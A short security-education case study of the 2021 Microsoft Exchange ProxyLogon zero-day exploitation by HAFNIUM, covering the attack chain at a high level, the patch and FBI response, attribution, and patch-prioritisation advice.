Zero-Day Exploitscritical

Exchange ProxyLogon: 250,000 Servers Backdoored in 24 Hours via Email Server Zero-Days

Four zero-day vulnerabilities in Microsoft Exchange Server were exploited by Chinese hackers before Microsoft could patch them, backdooring an estimated 250,000 Exchange servers — including US defence contractors and infectious disease researchers — within 24 hours of public disclosure.

Microsoft Exchange / Global·2021·2 min read

Background

Microsoft Exchange Server is the most widely deployed email server software in enterprise environments worldwide. The ProxyLogon vulnerability chain (CVE-2021-26855, -26857, -26858, -27065) was discovered by Volexity and DEVCORE in January 2021 and reported to Microsoft. The Chinese group HAFNIUM was already exploiting it.

The Attack

ProxyLogon allowed an unauthenticated attacker to access Exchange servers by bypassing authentication via a server-side request forgery vulnerability (CVE-2021-26855), then use post-authentication vulnerabilities to write web shells (backdoors accessible via HTTP) to the server. The attack required no credentials. HAFNIUM had been exploiting the zero-days for months, targeting infectious disease researchers, law firms, defence contractors, and think tanks. When Microsoft released patches on March 2, 2021, other nation-state groups and criminal actors immediately weaponised the details, triggering mass exploitation. Approximately 250,000 Exchange servers were backdoored within 24 hours.

Response

Microsoft released patches on March 2, 2021, alongside public disclosure. CISA issued an emergency directive requiring all federal agencies to patch within four days. Microsoft released a one-click remediation tool. The FBI obtained a court order to remotely remove web shells from hundreds of infected US servers — an extraordinary legal precedent.

Outcome

Tens of thousands of organisations were still finding ProxyLogon web shells months later. The FBI's court-ordered remote remediation was controversial but legally unprecedented. The Chinese Ministry of State Security was officially blamed by the US, EU, and NATO — the broadest attribution of a Chinese cyber operation.

Key Takeaways

  1. Email servers must be patched within hours of critical vulnerability disclosure — they are always a top target
  2. Web shells left after exploitation create persistent access even after vulnerabilities are patched — scan for them
  3. Patch disclosure triggers immediate mass exploitation — assume you will be attacked the day a patch is released
  4. FBI remote remediation of private company servers set a significant legal precedent for government cyber response

How to Prevent This

All guides
beginner

Prioritise patching internet-facing systems first, then internal systems

Not all systems carry equal risk. An internet-facing web application, VPN concentrator, email server, or API gateway can be exploited by anyone on the internet without prior access. Internal systems require the attacker to already be on your network. Apply patches to externally exposed systems first, within your 72-hour window for critical vulnerabilities. The Exchange ProxyLogon vulnerabilities were exploited by 10 separate threat actors within 24 hours of the patch being released — the gap between patch availability and deployment on internet-facing Exchange servers was measured in hours, not days.

See: Exchange ProxyLogonPatch Management
ProxyLogonExchangeHAFNIUMweb shellChina

More in Zero-Day Exploits

2017critical

EternalBlue: NSA's Stolen Weapon Powers WannaCry, NotPetya, and Years of Attacks

2 min readZero-Day Exploits
2021critical

Log4Shell: A Single Java Library Puts 3 Billion Devices at Risk

2 min readZero-Day Exploits
2023critical

MOVEit Zero-Day: One SQL Injection Flaw, 2,700 Organisations Breached

2 min readZero-Day Exploits